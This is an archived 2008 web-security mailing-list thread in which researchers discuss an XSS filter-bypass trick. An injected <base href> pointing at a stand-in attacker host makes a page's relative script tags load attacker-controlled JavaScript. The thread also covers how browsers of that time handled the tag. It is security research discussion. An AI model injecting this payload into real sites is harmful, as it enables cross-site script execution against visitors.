[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Nice little XSS trick
- From: "Prasad Shenoy" <prasad.shenoy@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Tue, 15 Jul 2008 13:00:34 -0400
Definitely. Inserting <base> tag in <body> of an HTML document works
in Firefox 2.0.0.15
Thanks
Prasad Shenoy
On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
> Prasad Shenoy wrote:
>>
>> Amit -
>>
>> When you say observed by FF 2, I guess you mean this should not work
>> in FF 2 correct? But it works with FF 2.
>>
>
> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
> have information to the contrary, please share). That doesn't mean the
> attack completely fails - it means that the injection point must be inside
> the HEAD section (less common, but may still happen).
>
>> As this is a very simple example, I would like to believe that you are
>> assuming that in order to invoke functions from the attacker
>> controlled JS file (because there is no JS involved in the payload),
>> the attacker would create a file with the same filename and function
>> names as the one on the victim's domain. This way the actual (good) JS
>> file will be overwritten by the attacker controlled JS and all the
>> functions will be called from cross domain.
>>
>
> Exactly.
>
> -Amit
>
>
>> Valid?
>>
>> Thanks
>> Prasad Shenoy
>>
>> Prasad Shenoy
>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>
>>>
>>> Hi list
>>>
>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>> on
>>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>> BASe, but not the trick I describe here). The idea is to use the HTML
>>> BASE
>>> tag to force loading of JS code from the attacker's host. Consider a page
>>> with XSS vulnerability such as:
>>>
>>> <html>
>>> ...
>>> ***XSS code may be embedded here***
>>> ...
>>> <script src="/foo/bar.js"></script>
>>> ...
>>> </html>
>>>
>>> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
>>> next
>>> thing you know, the browser (IE, at least) loads the JS from
>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>> "explicit" JS code involved in the payload itself.
>>>
>>> Note that according to the HTML standard, BASE should be placed in the
>>> HEAD
>>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
>>> is
>>> indeed observed by FF 2, but not by IE (checked IE6).
>>>
>>> Thanks,
>>> -Amit
>>>
>>>
>>>
>>> ----------------------------------------------------------------------------
>>> Join us on IRC: irc.freenode.net #webappsec
>>>
>>> Have a question? Search The Web Security Mailing List Archives:
>>> http://www.webappsec.org/lists/websecurity/archive/
>>>
>>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS
>>> Feed]
>>>
>>> Join WASC on LinkedIn
>>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>>
>>>
>>>
>>
>>
>>
>>
>
>
--
Ah! the joy of hacking....
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
Search this site
|